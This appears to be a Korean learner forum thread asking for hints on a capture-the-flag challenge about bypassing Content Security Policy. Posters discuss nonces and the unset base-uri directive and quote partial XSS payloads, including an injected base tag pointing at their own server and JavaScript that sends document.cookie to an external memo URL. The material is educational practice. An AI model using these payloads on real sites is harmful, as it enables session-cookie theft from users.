CSP Bypass Advanced

<script src=/vuln?param=<script>alert(1)</script>></script> 대략 이런식으로 vuln 페이지에서 테스트 해보았을때 html 코드를 받아와 작동이 안되는 것같습니다. script 태그의 type 도 혹시나하여 text/html 로 변경해 보았는데 실패했습니다. 문제가 아예 지전이 없네요 힌트등.. 도움을 주시면 감사하겠습니다.

nonce를 이용하는 문제인 거 같은데 ㅠㅠㅠ nonce를 예측해서 스크립트를 실행하는게 맞는 건가요?

nonce를 통해 문제를 푸는거같은데 강의를 보면 정적파일에 접속하여 캐시를 저장후 해당 nonce값을 통해 문제를 푸는 방향인거 같은데 /vuln/static/css/bootstrap.min.css 으로 접속 시 404에러가 뜨고 새로고침 시 응답값에 nonce값은 고정이 되지 않는데 잘못된 방향으로 풀고 있는걸까요?

질문이랑 문제 참고해서 뭔가 계속 검색해가면서 보는데 더 미궁에 빠져들어서 일주일째 못풀고 있습니다. 힌트 좀 부탁드립니다.. base-uri 미지정 부분을 이용해서 푸는 문제 같아서 여기에 집중해봤는데 이제는 아닌거 같아요.

궁금한게 이 문제는 강의에 있는 내용만 가지고도 풀 수 있는 문제인가요? Vuln.html 파일을 제공한 이유가 |safe 가 있는 것을 보여 줄려고 그런건지 아님 문제 풀이에 다른 힌트가 있어서 그런건지 알고 싶습니다

응답 값을 통해 설정된 CSP 값들을 확인하였을때, 설정이 안된 딱 한가지 옵션이 있더라구요 그 옵션을 이용하여, 개인 서버를 이용하여 푸는 방식을 생각 중인데 이 방향이 맞는지 잘 모르겠습니다.. 아니면 혹시 <meta> 태그를 사용해서 sha-256에 대한 설정을 주어 스크립트를 구동시키는 건가요..? 방향에 대한 조언 부탁드립니다ㅠㅠ..

강의에 나온대로 base-uri방식으로 진행하려 하는데 잘 안되네요..개인 서버에 static/js 경로에 jquery.min.js파일을 만들고 base태그를 사용해서 <script src="/vuln?param='<base href='http://IP_addr/'>'"> <base href='http://IP_addr/'> 두 방법으로 시도했는데 잘 안되네요.. 스크립트 파일 안에는 document.location='http://host3.dreamhack.games:port/memo?memo='+document.cookie같이 작성했습니다.. 혹시 이 부분에서 잘못된것이 있을까요 아니면 방향이 틀린걸까요..ㅜ

location href 사용시 두개가 동일하다고 생각했는데 아래꺼만 동작하는 이유가 뭔지 궁금합니다...!! location.href = "http://host3.dreamhack.games:18374/memo?memo="+document.cookie location.href = "http://127.0.0.1:8000/memo?=memo"+document.cookie

vuln 페이지에서 base 태그로 개인 서버의 자바스크립트 실행해서 memo에 빈칸 나오는 것 까지는 확인햇습니다 그런데 flag 페이지에서는 계속 wrong이 뜨네요... 그리고 자바스크립트 파일에 코드를 밑에처럼 넣으면 안되는 이유가 무엇인가요? location.href = "http://host3.dreamhack.games:{port}/memo?memo="+document.cookie

제 깃허브 레포지토리 이용해서 /static/js/bootstrap.min.js 에 다음과 같이 location.href = "http://127.0.0.1:8000/memo?=memo"+document.cookie 삽입했습니다. 개발자 도구에서 해당 스크립트를 받아오는지 까지 확인을 한 결과, source에서 bootstrap.min.js 확인시, 잘 받아옵니다. 한데, 곧이어 127.0.0.1 에서 연결을 거부했다는 오류가 뜨네요 .. 이유가 뭘까요?